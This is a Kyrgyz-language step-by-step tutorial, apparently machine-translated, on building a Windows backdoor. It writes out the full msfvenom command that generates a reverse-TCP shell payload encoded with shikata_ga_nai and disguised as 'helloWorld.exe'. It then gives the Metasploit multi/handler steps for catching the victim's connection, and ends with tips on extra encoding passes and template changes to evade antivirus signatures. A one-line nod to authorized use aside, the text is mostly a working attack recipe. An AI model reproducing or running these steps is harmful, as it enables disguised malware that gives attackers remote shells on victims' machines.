Арткы эшик коопсуздук механизмдерин айланып өтүү үчүн колдонулат, көбүнчө жашыруун жана негизинен байкалбайт. MSFvenom, msfpayload жана msfencode айкалышын колдонуу менен, тескери кабык TCPди колдонуу менен чабуулчуга кайра туташкан арткы эшикти түзсө болот. Арткы эшикти иштеп чыгуу үчүн, антивирустук программадан качуу үчүн зыяндуу программаңыздын колтамгасын өзгөртүү керек. Бул долбоорду кирүүгө уруксатыңыз бар бир жуп компьютерде аяктаңыз, жана процессте сиз компьютердин коопсуздугу жана бул эшиктин кандай иштээри жөнүндө көбүрөөк билесиз.
Кадамдар
Кадам 1. Калини иштетип, Терминалдын консолун күйгүзүңүз
Кадам 2. Interfaceти көрсөтүү үчүн ifconfig териңиз жана IP дарегиңизди текшериңиз
Кадам 3. Тип msfvenom -l encoders кодерлердин тизмесин көрсөтүү үчүн
Сиз коддогуч катары x86/shikata_ga_nai колдоносуз
4 -кадам. "Msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe териңиз
- -a x86 -платформанын терезелери архитектураны белгилейт.
- -p windows/shell/reverse_tcp жүктөө үчүн жүктөрдү белгилейт.
- LHOST угуучунун IP дарегин аныктайт.
- LPORT угуучу портун белгилейт.
- -b "\ x00" жаман мүнөздөн (null байт) оолак болууну белгилейт.
- -e x86/shikata_ga_nai коддогучтардын атын белгилейт.
- -f exe> helloWorld.exe форматтын чыгышын белгилейт.
Кадам 5. Metasploitти жандандыруу үчүн msfconsole териңиз
Эми сиз арткы эшигиңизди түздүңүз. Жабырлануучу helloWorld.exeге чыкылдатканда, камтылган кабык жүктөлүшү активдештирилип, кайра тутумуңузга туташат. Байланышты алуу үчүн, Metasploitте мульти-иштеткичти ачып, жүктөмдөрдү орнотушуңуз керек
Step 6. Type Use exploit/multi/handler
Кадам 7. Түр жүктөө терезелери/shell/reverse_tcp
Кадам 8. Модулду текшерүү үчүн шоу варианттарын териңиз
Step 9. Type LHOST 192.168.48.129
"LHOST" угуучунун IP дарегин белгилейт
Step 10. Type LPORT 4444 териңиз
"LPORT" угуучу портун аныктайт
Кадам 11. Run деп териңиз жана жабырлануучунун машинасынан туташууну күтүңүз
Кадам 12. Жабырлануучунун helloWorld.exeге чыкмасын күтө туруңуз
Андан кийин сиз жабырлануучунун машинасына ийгиликтүү туташасыз.
Кеңештер
- -I MSFvenomдо колдонуу коддоонун кайталанышын билдирет. Кээде дагы кайталоолор AV программасынан качууга жардам берет.
- Сиз арткы эшикти кантип түзүүнү жана MSFvenomду колдонуу менен коддолууну үйрөндүңүз, бирок бул ыкма азыркы учурда кээ бир AV программалык камсыздоосуна каршы иштебейт. Мунун себеби MSFvenomдогу аткаруу шаблондоруна байланыштуу. AV сатуучулар бул шаблондордун статикалык колтамгасын кошушту жана аларды издешет. Бул маселени чечүү үчүн башка аткаруу шаблонун же башка куралдарды колдонуу керек.